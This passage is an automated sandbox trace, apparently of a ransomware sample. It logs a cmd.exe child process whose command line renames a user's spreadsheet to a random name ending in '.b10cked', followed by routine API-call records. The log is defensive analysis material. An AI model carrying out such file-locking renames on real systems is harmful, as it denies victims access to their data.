returned 0x409 [0132.227] exit (_Code=0) Process: id = "106" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168a0" os_pid = "0xa50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11913 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11914 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 11915 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 11916 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 11917 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11918 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11919 
start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11920 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11921 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 11922 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12099 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12100 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12101 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12102 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 12103 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 12104 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12105 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 
12106 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12107 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12108 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12109 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12110 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12111 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12112 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12113 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 12114 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12115 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = 
"msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12116 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 12117 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 12118 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 12119 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 12120 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 12121 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 12122 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Thread: id = 162 os_tid = 0x9a4 [0131.647] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f874 | out: lpSystemTimeAsFileTime=0x12f874*(dwLowDateTime=0x886729e0, dwHighDateTime=0x1d440a9)) [0131.647] GetCurrentProcessId () returned 0xa50 [0131.647] GetCurrentThreadId () returned 0x9a4 [0131.647] GetTickCount () returned 0x29f2b [0131.647] QueryPerformanceCounter (in: lpPerformanceCount=0x12f86c | out: lpPerformanceCount=0x12f86c*=18843585088) returned 1 [0131.647] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0131.647] __set_app_type (_Type=0x1) [0131.647] __p__fmode () returned 0x76b331f4 [0131.647] __p__commode () returned 0x76b331fc [0131.647] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0131.647] __getmainargs (in: _Argc=0x4a9e4238, 
_Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0131.648] GetCurrentThreadId () returned 0x9a4 [0131.648] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9a4) returned 0x38 [0131.648] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.648] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0131.648] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.648] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.648] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f804 | out: phkResult=0x12f804*=0x0) returned 0x2 [0131.648] VirtualQuery (in: lpAddress=0x12f83b, lpBuffer=0x12f7d4, dwLength=0x1c | out: lpBuffer=0x12f7d4*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.648] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f7d4, dwLength=0x1c | out: lpBuffer=0x12f7d4*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0131.648] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f7d4, dwLength=0x1c | out: lpBuffer=0x12f7d4*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0131.648] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f7d4, dwLength=0x1c | out: lpBuffer=0x12f7d4*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.648] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f7d4, dwLength=0x1c | out: lpBuffer=0x12f7d4*(BaseAddress=0x130000, 
AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0131.648] GetConsoleOutputCP () returned 0x1b5 [0131.648] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.649] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0131.649] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.649] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0131.649] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.649] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.649] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.649] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.649] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.649] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.649] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.649] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0131.649] GetEnvironmentStringsW () returned 0x270180* [0131.650] FreeEnvironmentStringsW (penv=0x270180) returned 1 [0131.650] GetEnvironmentStringsW () returned 0x270180* [0131.650] FreeEnvironmentStringsW (penv=0x270180) returned 1 [0131.650] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e774 | out: phkResult=0x12e774*=0x40) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x0, lpData=0x12e780*=0xa8, lpcbData=0x12e778*=0x1000) returned 0x2 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x4, lpData=0x12e780*=0x1, lpcbData=0x12e778*=0x4) returned 0x0 [0131.650] RegQueryValueExW 
(in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x0, lpData=0x12e780*=0x1, lpcbData=0x12e778*=0x1000) returned 0x2 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x4, lpData=0x12e780*=0x0, lpcbData=0x12e778*=0x4) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x4, lpData=0x12e780*=0x40, lpcbData=0x12e778*=0x4) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x4, lpData=0x12e780*=0x40, lpcbData=0x12e778*=0x4) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x0, lpData=0x12e780*=0x40, lpcbData=0x12e778*=0x1000) returned 0x2 [0131.650] RegCloseKey (hKey=0x40) returned 0x0 [0131.650] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e774 | out: phkResult=0x12e774*=0x40) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x0, lpData=0x12e780*=0x40, lpcbData=0x12e778*=0x1000) returned 0x2 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x4, lpData=0x12e780*=0x1, lpcbData=0x12e778*=0x4) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, 
lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x0, lpData=0x12e780*=0x1, lpcbData=0x12e778*=0x1000) returned 0x2 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x4, lpData=0x12e780*=0x0, lpcbData=0x12e778*=0x4) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x4, lpData=0x12e780*=0x9, lpcbData=0x12e778*=0x4) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x4, lpData=0x12e780*=0x9, lpcbData=0x12e778*=0x4) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x0, lpData=0x12e780*=0x9, lpcbData=0x12e778*=0x1000) returned 0x2 [0131.651] RegCloseKey (hKey=0x40) returned 0x0 [0131.651] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886366 [0131.651] srand (_Seed=0x5b886366) [0131.651] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked\"" [0131.651] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked\"" [0131.651] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.651] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2718e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0131.651] 
GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0131.651] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.651] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.651] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0131.651] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0131.651] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0131.651] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0131.651] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0131.651] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0131.651] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0131.651] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0131.651] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0131.652] GetEnvironmentStringsW () returned 0x2722d0* [0131.652] FreeEnvironmentStringsW (penv=0x2722d0) returned 1 [0131.652] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.652] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.652] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0131.652] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0131.652] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0131.652] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0131.652] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0131.652] _wcsicmp (_String1="KEYS", _String2="TIME") 
returned -9 [0131.652] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0131.652] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0131.652] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f540 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.652] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f540, lpFilePart=0x12f53c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f53c*="Desktop") returned 0x18 [0131.652] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.652] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f2bc | out: lpFindFileData=0x12f2bc) returned 0x270010 [0131.652] FindClose (in: hFindFile=0x270010 | out: hFindFile=0x270010) returned 1 [0131.652] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f2bc | out: lpFindFileData=0x12f2bc) returned 0x270010 [0131.653] FindClose (in: hFindFile=0x270010 | out: hFindFile=0x270010) returned 1 [0131.653] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f2bc | out: lpFindFileData=0x12f2bc) returned 0x270010 [0131.653] FindClose (in: hFindFile=0x270010 | out: hFindFile=0x270010) returned 1 [0131.653] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.653] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0131.653] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0131.653] GetEnvironmentStringsW () returned 0x272af0* [0131.653] FreeEnvironmentStringsW (penv=0x272af0) returned 1 [0131.653] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.654] GetConsoleOutputCP () returned 0x1b5 [0131.654] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.654] GetUserDefaultLCID () returned 0x409 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f680, cchData=128 | out: lpLCData="0") returned 2 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f680, cchData=128 | out: lpLCData="0") returned 2 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f680, cchData=128 | out: lpLCData="1") returned 2 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0131.655] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0131.655] GetConsoleTitleW (in: lpConsoleTitle=0x2608e0, 
nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.655] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.655] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0131.656] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0131.656] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0131.656] _wcsicmp (_String1="move", _String2=")") returned 68 [0131.656] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0131.656] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0131.656] _wcsicmp (_String1="IF", _String2="move") returned -4 [0131.656] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0131.656] _wcsicmp (_String1="REM", _String2="move") returned 5 [0131.656] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0131.659] GetConsoleTitleW (in: lpConsoleTitle=0x12f378, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.659] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0131.659] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0131.659] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0131.659] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0131.659] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0131.659] _wcsicmp (_String1="move", _String2="CD") returned 10 [0131.659] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0131.659] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0131.659] _wcsicmp (_String1="move", _String2="REN") returned -5 [0131.659] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0131.659] _wcsicmp (_String1="move", _String2="SET") returned -6 [0131.659] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0131.659] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0131.659] _wcsicmp (_String1="move", _String2="TIME") returned -7 
[0131.660] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0131.660] _wcsicmp (_String1="move", _String2="MD") returned 11 [0131.660] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0131.660] _wcsicmp (_String1="move", _String2="RD") returned -5 [0131.660] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0131.660] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0131.660] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0131.660] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0131.660] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0131.660] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0131.660] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0131.660] _wcsicmp (_String1="move", _String2="VER") returned -9 [0131.660] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0131.660] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0131.660] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0131.660] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0131.660] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0131.660] _wcsicmp (_String1="move", _String2="START") returned -6 [0131.660] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0131.660] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0131.660] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0131.661] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0131.661] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0131.661] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f134, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f12c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f12c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0131.662] _wcsnicmp (_String1="COPYCMD", 
